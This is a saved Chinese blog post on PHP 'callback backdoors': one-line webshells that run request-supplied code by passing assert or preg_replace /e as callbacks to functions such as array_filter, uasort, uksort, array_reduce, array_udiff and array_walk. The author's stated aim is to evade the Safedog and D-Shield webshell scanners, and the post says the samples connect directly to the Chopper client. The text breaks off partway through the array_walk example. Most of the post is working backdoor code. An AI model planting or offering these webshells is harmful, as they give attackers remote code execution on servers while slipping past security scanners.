
<!-- saved from url=(0065)https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html -->
<html class="no-js"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="keywords" content="网络安全,代码审计,信息安全,漏洞挖掘,php,C++,mysql,python,webshell,WAF绕过,回调后门">
    <meta name="description" content="最近很多人分享一些过狗过盾的一句话，但无非是用各种方法去构造一些动态函数，比如$_GET[&#39;func&#39;]($_REQUEST[&#39;pass&#39;])之类的方法。万变不离其宗，但这种方法...">
    <meta name="generator" content="emlog">
    <title>创造tips的秘籍——PHP回调后门 - 离别歌</title>
    <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.leavesongs.com/xmlrpc.php?rsd">
    <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.leavesongs.com/wlwmanifest.xml">
    <link rel="alternate" type="application/rss+xml" title="RSS" href="https://www.leavesongs.com/rss.php">
    <link href="./创造tips的秘籍——PHP回调后门 - 离别歌_files/base.css" rel="stylesheet" type="text/css">
    <link href="./创造tips的秘籍——PHP回调后门 - 离别歌_files/style.css" rel="stylesheet" type="text/css">
    <script type="text/javascript" async="" defer="" src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/piwik.js.下载"></script><script src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/jquery-1.9.1.min.js.下载"></script>
    <script src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/common_tpl.js.下载" type="text/javascript"></script>
    <link rel="shortcut icon" href="https://www.leavesongs.com/favicon.ico">
    
	<script type="text/javascript" src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/brush.js.下载"></script>
	<link type="text/css" rel="stylesheet" href="./创造tips的秘籍——PHP回调后门 - 离别歌_files/shCore.css">
	<link type="text/css" rel="stylesheet" href="./创造tips的秘籍——PHP回调后门 - 离别歌_files/shThemeDefault.css">
	<script type="text/javascript">SyntaxHighlighter.config.clipboardSwf = 'https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf';SyntaxHighlighter.all();</script>
	<link rel="stylesheet" type="text/css" href="./创造tips的秘籍——PHP回调后门 - 离别歌_files/mob-share.css"><style type="text/css">.highslide img {cursor: url(https://www.leavesongs.com/content/plugins/kl_highslide/highslide/graphics/zoomin.cur), pointer !important;}</style></head>
<body>
<!--[if lt IE 8]>
    <div class="browsehappy" role="dialog">当前网页 <strong>不支持</strong> 你正在使用的浏览器. 为了正常的访问, 请 <a href="http://browsehappy.com/">升级你的浏览器</a>.</div>
<![endif]-->
<div id="header">
    <div class="container">             
        <h1 class="h1-title">
            <a href="https://www.leavesongs.com/">
               <img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/logo.png" alt="离别歌">
            </a>
        </h1>
        <div id="nav">
        <input type="checkbox" id="button">
        <label for="button" onclick="">菜单</label>
        <ul><li class="item common"><a href="https://www.leavesongs.com/">首页</a></li><li class="item common"><a href="https://www.leavesongs.com/sort/PENETRATION">网络安全</a></li><li class="item common"><a href="https://www.leavesongs.com/sort/PHP">PHP</a></li><li class="item common"><a href="https://www.leavesongs.com/sort/HTML">web前端</a></li><li class="item common"><a href="https://www.leavesongs.com/sort/PYTHON">Python</a></li><li class="item common"><a href="https://www.leavesongs.com/PENETRATION/tinger.html">关于我</a></li><li class="item common"><a href="https://github.com/phith0n/mooder" target="_blank">Mooder</a></li><li class="item common"><a href="http://wiki.ioin.in/" target="_blank">Sec-News</a></li></ul>        </div>
    </div>
</div>
<div class="banner-bar">
    <div class="container">
        <div class="col-12 columns">
            <div class="place">
                <a href="https://www.leavesongs.com/">首页</a> » <a href="https://www.leavesongs.com/sort/PENETRATION">网络安全</a> » 创造tips的秘籍——PHP回调后门            </div>
        </div>
    </div>
</div>
<div class="container">
    <div class="col-11 columns" id="mainbody" role="main">
        <div class="post-single type-post appeared">
            <h1 class="article-h1">创造tips的秘籍——PHP回调后门</h1>
            <div class="details-up">
  <span class="author">作者: <a itemprop="name" href="https://www.leavesongs.com/author/1" rel="author">phithon</a></span>
    <span class="category">分类: <a href="https://www.leavesongs.com/sort/PENETRATION">网络安全</a></span>
    <span class="date">时间: 2015-6-22 1:46</span>
  <span class="comments-top" itemprop="interactionCount">评论: <a itemprop="discussionUrl" href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#comments">5条评论</a></span>
  <span class="comments-top" itemprop="interactionCount">浏览: <a itemprop="discussionUrl" href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html">6592人看过</a></span>
    <span class="date">标签: 	<a href="https://www.leavesongs.com/tag/webshell">webshell</a>	<a href="https://www.leavesongs.com/tag/WAF%E7%BB%95%E8%BF%87">WAF绕过</a>	<a href="https://www.leavesongs.com/tag/%E5%9B%9E%E8%B0%83%E5%90%8E%E9%97%A8">回调后门</a></span>
  </div>
            <div class="entry">
                <p>
	&nbsp;&nbsp;&nbsp;&nbsp;最近很多人分享一些过狗过盾的一句话，但无非是用各种方法去构造一些动态函数，比如$_GET['func']($_REQUEST['pass'])之类的方法。万变不离其宗，但这种方法，虽然狗盾可能看不出来，但人肉眼其实很容易发现这类后门的。
</p>
<p>
	&nbsp; &nbsp; 那么，我就分享一下，一些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。
</p>
<p>
	<strong style="line-height:1.5;">0x00 前言</strong> 
</p>
<p>
	&nbsp; &nbsp; 有很多朋友喜欢收藏一些tips，包括我也收藏了好多tips，有时候在渗透和漏洞挖掘过程中很有用处。
</p>
<p>
	&nbsp; &nbsp; 一句话的tips相信很多朋友也收集过好多，过狗一句话之类的。14年11月好像在微博上也火过一个一句话，当时也记印象笔记里了：
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201506/51631434650097.png" id="ematt:924" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-51631434650097.png" title="点击查看原图" alt="QQ20150619-2@2x.png" border="0" width="650" height="227"></a> 
</p>
<p>
	&nbsp; &nbsp; 最近又看到有人在发这个：http://www.secoff.net/archives/436.html
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;有同学收集tips，就有同学创造tips。那么我们怎么来创造一些过狗、过D盾、无动态函数、无危险函数（无特征）的一句话（后门）？
</p>
<p>
	&nbsp; &nbsp; 根据上面这个pdo的一句话，我就可以得到一个很具有普适性的结论：<strong>php中包含回调函数参数的函数，具有做后门的潜质。</strong> 
</p>
<p>
	&nbsp; &nbsp; 我就自己给这类webshell起了个名字：回调后门。
</p>
<p>
	<br>
</p>
<p>
	<strong>0x01 回调后门的老祖宗</strong> 
</p>
<p>
	&nbsp; &nbsp; php中call_user_func是执行回调函数的标准方法，这也是一个比较老的后门了：
</p>
<div id="highlighter_229835" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_229835_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_229835" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="plain">call_user_func(</code><code class="string">'assert'</code><code class="plain">, </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">]);</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; assert直接作为回调函数，然后$_REQUEST['pass']作为assert的参数调用。
<p>
	<br>
</p>
<p>
	&nbsp; &nbsp; 这个后门，狗和盾都可以查到（但是狗不会拦截）：
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/77661437152543.png" id="ematt:948" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-77661437152543.png" title="点击查看原图" alt="QQ20150718-1@2x.png" border="0" width="650" height="248"></a> 
</p>
<p>
	&nbsp; &nbsp; 可php的函数库是很丰富的，只要简单改下函数安全狗就不杀了：
</p>
<div id="highlighter_960023" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_960023_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_960023" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="plain">call_user_func_array(</code><code class="string">'assert'</code><code class="plain">, </code><code class="keyword">array</code><code class="plain">(</code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">]));</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; call_user_func_array函数，和call_user_func类似，只是第二个参数可以传入参数列表组成的数组。如图：
<p>
	<br>
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/e93e1437153698.png" id="ematt:950" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-e93e1437153698.png" title="点击查看原图" alt="QQ20150718-2@2x.png" border="0" width="650" height="264"></a> 
</p>
<p>
	&nbsp; &nbsp; 可见，虽然狗不杀了，D盾还是聪明地识别了出来。
</p>
<p>
	&nbsp; &nbsp; 看来，这种传统的回调后门，已经被一些安全厂商盯上了，存在被查杀的风险。
</p>
<p>
	<br>
</p>
<p>
	<strong>0x02 数组操作造成的单参数回调后门</strong> 
</p>
<p>
	&nbsp; &nbsp; 进一步思考，在平时的php开发中，遇到过的带有回调参数的函数绝不止上面说的两个。这些含有回调（callable类型）参数的函数，其实都有做“回调后门”的潜力。
</p>
<p>
	&nbsp; &nbsp; 我最早想到个最“简单好用的”：
</p>
<div id="highlighter_366388" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_366388_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_366388" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$e</code> <code class="plain">= </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'e'</code><code class="plain">];</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="variable">$arr</code> <code class="plain">= </code><code class="keyword">array</code><code class="plain">(</code><code class="variable">$_POST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">],);</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="functions">array_filter</code><code class="plain">(</code><code class="variable">$arr</code><code class="plain">, </code><code class="functions">base64_decode</code><code class="plain">(</code><code class="variable">$e</code><code class="plain">));</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; array_filter函数是将数组中所有元素遍历并用指定函数处理过滤用的，如此调用（此后的测试环境都是开着狗的，可见都可以执行）：
<p>
	<br>
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/d3881437155040.png" id="ematt:954" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-d3881437155040.png" title="点击查看原图" alt="QQ20150718-5@2x.png" border="0" width="650" height="336"></a> 
</p>
<p>
	&nbsp; &nbsp; 这个后门，狗查不出来，但D盾还是有感应，报了个等级3（显然比之前的等级4要低了）：
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/f71d1437155038.png" id="ematt:952" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-f71d1437155038.png" title="点击查看原图" alt="QQ20150718-4@2x.png" border="0" width="650" height="284"></a> 
</p>
<p>
	&nbsp; &nbsp; 类似array_filter，array_map也有同样功效：
</p>
<div id="highlighter_428377" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_428377_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_428377" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$e</code> <code class="plain">= </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'e'</code><code class="plain">];</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="variable">$arr</code> <code class="plain">= </code><code class="keyword">array</code><code class="plain">(</code><code class="variable">$_POST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">],);</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="functions">array_map</code><code class="plain">(</code><code class="functions">base64_decode</code><code class="plain">(</code><code class="variable">$e</code><code class="plain">), </code><code class="variable">$arr</code><code class="plain">);</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 依旧被D盾查杀。
<p>
	&nbsp; &nbsp; 果然，简单的数组回调后门，还是很容易被发现与查杀的。
</p>
<p>
	<br>
</p>
<p>
	<strong>0x03 php5.4.8+中的assert</strong> 
</p>
<p>
	&nbsp; &nbsp; php 5.4.8+后的版本，assert函数由一个参数，增加了一个可选参数descrition：
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/73dc1437155703.png" id="ematt:956" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-73dc1437155703.png" title="点击查看原图" alt="QQ20150718-7@2x.png" border="0" width="650" height="134"></a> 
</p>
<p>
	&nbsp; &nbsp; 这就增加（改变）了一个很好的“执行代码”的方法assert，这个函数可以有一个参数，也可以有两个参数。那么以前回调后门中有两个参数的回调函数，现在就可以使用了。
</p>
<p>
	&nbsp; &nbsp; 比如如下回调后门：
</p>
<div id="highlighter_349564" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_349564_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_349564" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$e</code> <code class="plain">= </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'e'</code><code class="plain">];</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="variable">$arr</code> <code class="plain">= </code><code class="keyword">array</code><code class="plain">(</code><code class="string">'test'</code><code class="plain">, </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">]);</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="plain">uasort(</code><code class="variable">$arr</code><code class="plain">, </code><code class="functions">base64_decode</code><code class="plain">(</code><code class="variable">$e</code><code class="plain">));</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 这个后门在php5.3时会报错，提示assert只能有一个参数：
<p>
	<br>
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/d1791437156028.png" id="ematt:958" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-d1791437156028.png" title="点击查看原图" alt="QQ20150718-8@2x.png" border="0" width="650" height="220"></a> 
</p>
<p>
	&nbsp; &nbsp; php版本改作5.4后就可以执行了：
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/503c1437156036.png" id="ematt:960" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-503c1437156036.png" title="点击查看原图" alt="QQ20150718-9@2x.png" border="0" width="650" height="286"></a> 
</p>
<p>
	&nbsp; &nbsp; 这个后门，狗和盾是都查不出来的：
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/443c1437156131.png" id="ematt:962" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-443c1437156131.png" title="点击查看原图" alt="QQ20150718-6@2x.png" border="0" width="650" height="271"></a> 
</p>
<p>
	&nbsp; &nbsp; 同样的道理，这个也是功能类似：
</p>
<div id="highlighter_881366" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_881366_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_881366" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$e</code> <code class="plain">= </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'e'</code><code class="plain">];</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="variable">$arr</code> <code class="plain">= </code><code class="keyword">array</code><code class="plain">(</code><code class="string">'test'</code> <code class="plain">=&gt; 1, </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">] =&gt; 2);</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="plain">uksort(</code><code class="variable">$arr</code><code class="plain">, </code><code class="variable">$e</code><code class="plain">);</code></td></tr></tbody></table></div></div></div>
<p>
	<br>
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;再给出这两个函数，面向对象的方法：
</p>
<div id="highlighter_355127" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_355127_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_355127" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="comments">// way 0</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="variable">$arr</code> <code class="plain">= </code><code class="keyword">new</code> <code class="plain">ArrayObject(</code><code class="keyword">array</code><code class="plain">(</code><code class="string">'test'</code><code class="plain">, </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">]));</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="variable">$arr</code><code class="plain">-&gt;uasort(</code><code class="string">'assert'</code><code class="plain">);</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>4</code></td><td class="content">&nbsp;</td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>5</code></td><td class="content"><code class="comments">// way 1</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>6</code></td><td class="content"><code class="variable">$arr</code> <code class="plain">= </code><code class="keyword">new</code> <code class="plain">ArrayObject(</code><code class="keyword">array</code><code class="plain">(</code><code class="string">'test'</code> <code class="plain">=&gt; 1, </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">] =&gt; 2));</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>7</code></td><td class="content"><code class="variable">$arr</code><code class="plain">-&gt;uksort(</code><code class="string">'assert'</code><code class="plain">);</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 再来两个类似的回调后门：
<div id="highlighter_119667" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_119667_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_119667" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$e</code> <code class="plain">= </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'e'</code><code class="plain">];</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="variable">$arr</code> <code class="plain">= </code><code class="keyword">array</code><code class="plain">(1);</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="functions">array_reduce</code><code class="plain">(</code><code class="variable">$arr</code><code class="plain">, </code><code class="variable">$e</code><code class="plain">, </code><code class="variable">$_POST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">]);</code></td></tr></tbody></table></div></div></div>
<div id="highlighter_626250" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_626250_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_626250" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$e</code> <code class="plain">= </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'e'</code><code class="plain">];</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="variable">$arr</code> <code class="plain">= </code><code class="keyword">array</code><code class="plain">(</code><code class="variable">$_POST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">]);</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="variable">$arr2</code> <code class="plain">= </code><code class="keyword">array</code><code class="plain">(1);</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>4</code></td><td class="content"><code class="functions">array_udiff</code><code class="plain">(</code><code class="variable">$arr</code><code class="plain">, </code><code class="variable">$arr2</code><code class="plain">, </code><code class="variable">$e</code><code class="plain">);</code></td></tr></tbody></table></div></div></div>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;以上几个都是可以直接菜刀连接的一句话，但目标PHP版本在5.4.8及以上才可用。
</p>
<p>
	&nbsp; &nbsp; 我把上面几个类型归为：二参数回调函数（也就是回调函数的格式是需要两个参数的）
</p>
<p>
	<br>
</p>
<p>
	<strong>0x04 三参数回调函数</strong> 
</p>
<p>
	&nbsp; &nbsp; 有些函数需要的回调函数类型比较苛刻，回调格式需要三个参数。比如array_walk。
</p>
<p>
	&nbsp; &nbsp; array_walk的第二个参数是callable类型，正常情况下它是格式是两个参数的，但在0x03中说了，两个参数的回调后门需要使用php5.4.8后的assert，在5.3就不好用了。但这个回调其实也可以接受三个参数，那就好办了：
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/9be31437157461.png" id="ematt:964" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-9be31437157461.png" title="点击查看原图" alt="QQ20150718-11@2x.png" border="0" width="650" height="322"></a> 
</p>
<p>
	&nbsp; &nbsp; php中，可以执行代码的函数：
</p>
<ol>
	<li>
		<span style="line-height:1.5;">一个参数：assert</span> 
	</li>
	<li>
		<span style="line-height:1.5;">两个参数：assert （php5.4.8+）</span> 
	</li>
	<li>
		<span style="line-height:1.5;">三个参数：preg_replace /e模式</span> 
	</li>
</ol>
<p>
	&nbsp; &nbsp; 三个参数可以用preg_replace。所以我这里构造了一个array_walk + preg_replace的回调后门：
</p>
<div id="highlighter_90371" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_90371_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_90371" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$e</code> <code class="plain">= </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'e'</code><code class="plain">];</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="variable">$arr</code> <code class="plain">= </code><code class="keyword">array</code><code class="plain">(</code><code class="variable">$_POST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">] =&gt; </code><code class="string">'|.*|e'</code><code class="plain">,);</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="functions">array_walk</code><code class="plain">(</code><code class="variable">$arr</code><code class="plain">, </code><code 